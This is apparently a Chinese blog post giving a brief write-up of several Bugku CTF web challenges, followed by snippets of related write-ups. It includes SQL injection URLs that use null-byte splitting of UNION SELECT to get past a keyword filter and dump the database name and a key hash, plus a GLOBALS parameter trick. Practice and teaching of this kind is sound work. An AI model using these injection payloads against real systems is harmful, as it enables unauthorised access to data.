bugku 部分writeup

最新推荐文章于 2024-07-12 20:47:16 发布
最新推荐文章于 2024-07-12 20:47:16 发布
阅读量342 收藏
点赞数
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42520737/article/details/81210408
版权

域名解析

这道题皮的狠,不知道为什么我自己搭建的服务器,域名解析解决不了,但是只能痛过修改etc/hosts 添加 120.24.86.145 flag.bugku.com  r然后浏览器浏览falg.bugku.com

 

sql注入测试

首先进行爆库查看

http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201%20,database()%23

http://103.238.227.13:10087/?id=-1%20uni%00on%20sel%00ect%201,hash%20fr%00om%20sql3.key%23

注入语句因为代码中限制了注入那么我们就使用00截断进行注入

 

变量1

http://120.24.86.145:8004/index1.php?args=GLOBALS

传入的参数

 

 

 

 

D_dayup
关注
专栏目录
逆向练习--bugku love
weixin_43600412的博客
07-05 405
接下来,我要真正面对你了,我的逆向 love 首先要把下载的程序文件塞进peid查壳,: 发现他并没有壳。接着,塞进ida,查询: 有base64字样,猜测有base64加密;还有字眼“wrong flag”,双击引用,到这里了: 感觉没啥用。 查询反编译函数: C语言学的不太好,细致意思不了解,大致意思应该是输入一个字符串,经过某个函数之后,把字符串的每个字符+i,在与某个字符串作对比,对上了就...
Bugku-WEB-writeup(持续学习中~)
devil_sad的博客
11-12 3341
滑稽 打开题目发现一堆笑脸怼脸 按F12直接查看网页源代码即可获得flag 计算器 打开之后发现需要计算并输入验证码,可只能输入一位数字 我们可以右键单击输入框审查元素把maxlength改成3,使得我们能在验证框输入三位数 输入验证码即可得到flag 或者我们也可以直接点击上文中红框中的"js/code.js"也可以直接查看flag POST 通过阅读代码得知$what=='flag'即可得到flag 可是我们直接在URL后输入无法得到flag,于是...
[bugku逆向] love WriteUp
jiaqi0806的博客
02-23 246
用IDA打开reverse.exe 界面如下 快捷键 shift+F12 打开字符串视图 找到关键词:base64(考虑是否是base64编码?) 以及wrong/right flag的判断 双击wrong flag! 找到对应函数 ctrlX 后再F5可以打开对应的伪代码 观察代码成分 copy输入到dest并做了个累加 比较和str2的值 这里再根据之前base64的判断 可能是输入的字符...
Bugku---web---速度要快
最新发布
weixin_47450099的博客
07-12 1251
学习到cookie,提示利用python脚本建立与服务器之间的交互功能,以此查看flag
[CTF]Bugku love
qq_42152365的博客
02-12 1279
[CTF]Bugku love 100 {写博客不重要,记录思路最重要} 1.直接运行,发现有一句话,可以用来搜索,在ollydbg或者IDA中搜索,可以搜到,直接定位到关键位置 2.IDA中搜索flag可以发现wrong flag和right flag位置可以直接F5反编译或者空格出结构图,这里分析结构图 3.读如下汇编总结算法: 上面的代码主要是对用户输入的处理,其中strlen...
Bugku love
飞花的世界
02-03 904
https://ctf.bugku.com/challenges#love 首先是下载文件 程序的流程大体就是输入,然后比较。 所以首先用IDA打开程序, 使用 shift +F12  查看 有哪些字符串 看到有一个 enter the flag 那就是程序的入口吧,所以双击这个 字符串,然后 使用X , 查看地址   使用F5进行反编译   int sub...
bugku love
qq_41071646的博客
11-09 740
这个题还是有点意思的 一开始我因为没有装vs库 然后一直没有办法运行 后来 我 安装之后 就开始调试了这道题  然后发现了    难道只是简单的base64的加密  ? 然后我测试了一组数据 发现了 不对 。。。。。。。 emmmm 这就让我很难受  这坑爹的题 难道让我自己看 是什么加密么   然后  突然发现了一个好玩的东西   这个就是我们输入的字符串经过base64加密后的密文 那么...
bugku writeup(misc_1)
热门推荐
Time-s_up
10-01 2万+
题目网址:http://123.206.31.85/challenges 先大体梳理一下图片隐写的一般思路: 1.查看图片属性中的详细信息,2.用notepad打开查看内容,3.binwalk检查图片里是否存在其他文件,4.使用winhex观察或提取信息,5.stegsolve观察图片 分析流量包的一般思路: 1.追踪数据流,2.直接导出文件 1.这是一张单纯的图片?? 3
bugku-writeup-MISC-隐写3
dark的博客
09-13 442
题目:隐写3 工具:010 editor 01—修改高度 下载附件为一张png图片,使用010 editor打开 原宽度*原高度:02 A701 00(679*256) 现宽度*现高度02 A7 02 A7(679*679) 显示图片下面部分,得到flag。 tips:图片长度或者宽度明显差距比较大的,flag可能隐藏在图片为显示的部分,需要调整宽度或者高度查看。 ...
bugku-writeup-MISC-简单套娃
dark的博客
07-08 549
题目:简单套娃 工具:010 editor Stegsolve 01—010 editor查看图像 使用010 editor打开图像,发现两个图像头文件,将第二个头文件至后面部分保存为第二张图片。 02—Stegsolve图像分析 在图层中发现flag,flag不是很清晰,可以多个图像对应观察。 ...
bugku-writeup-MISC-贝斯手
dark的博客
06-30 346
题目:贝斯手 01—找密码 下载得到文件如上图所示。 打开介绍.txt文件,一定要完整的浏览,下拉条拉到最下面,有个提示:申猴,闰年,百度一下发现: 因此判断女神1992年出生。 使用1992对flag.zip解压缩: 可以查看到flag.txt 02—解码 5+58==327a6c4304ad5938eaf0efb6cc3e53dcCFmZknmK3SDEcMEue1wrsJdqqkt7dXLuS MD5编码:327a6c4304ad5938eaf0efb6cc
bugkuctf web基础部分 writeup
river
03-20 2887
Bugku-ctf-web 管理员系统 随便输入用户名和密码提示 窗体顶端 窗体底端 IP禁止访问,请联系本地管理员登陆,IP已被记录. 明显需要伪造允许登录的IP 知识点: XFF头(X-Forwarded-For),代表客户端,也就是HTTP的请求端真实的IP。有两种方式可以从HTTP请求中获得请求者的IP地址。一个是从Remote Address中获得,另一个是从X-Forward-For中...
bugku——love
qq_41129854的博客
07-18 1168
题目链接:https://ctf.bugku.com/challenges#love 作为一个逆向小白,这道题我觉得有必要记录下,这道题我自己分析了一半,没有完全分析出来(觉得是自己见的题少,没有做题经验,而且需要熟悉下各种加密),参考了网上大佬们的博客。 首先把这个拖进exeinfope中看看有啥重要信息没 从上面得到用c++写的,32位,无壳,符合PE结构, 然后拉进IDA中...
bugku:love
weixin_60553183的博客
01-19 2032
放入ida 这里进行交叉应用,同时注意一二三行告诉了你有base64加密 进去之后是这样 一个对比,可以发现是destination和str2进行比较 点进str2可以发现字符串 接下来进行for循环 出来之后进行base64解密 ...
逆向工程实战:BugKu——love题解
m0_74762365的博客
11-03 797
BugKu——love题解 本题简单涉及了base64,以及写了一个反逻辑的小脚本 笔者采用纯静态分析(IDA)版本
bugku第七个题目love
weixin_43575859的博客
05-05 207
首先把文件下载下来,是一个可执行文件,但是点击却无法运行: 重装之后也还是一样,一开始以为题目就是这样的,但是一直也没找到办法解决,后来看网上的解答发现他们的程序是可以运行的,有点懵,但是拖到 ida 和 od 里面还是可以看代码的,所以就将就着做了。 首先将程序拖入 ida : 找到主函数然后进入: 看到有"please enter the flag"的字样,看到这个应...
解密Bugku CTFMisc挑战:社工与二维码解析
"bugku ctf misc wp.pdf 是一个关于CTF比赛解题的writeup,主要涉及了社工和编码解密方面的知识。" 在CTF(Capture The Flag)竞赛中,"Misc"通常指的是各种混合类题目,涵盖广泛的知识领域,包括但不限于密码学、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值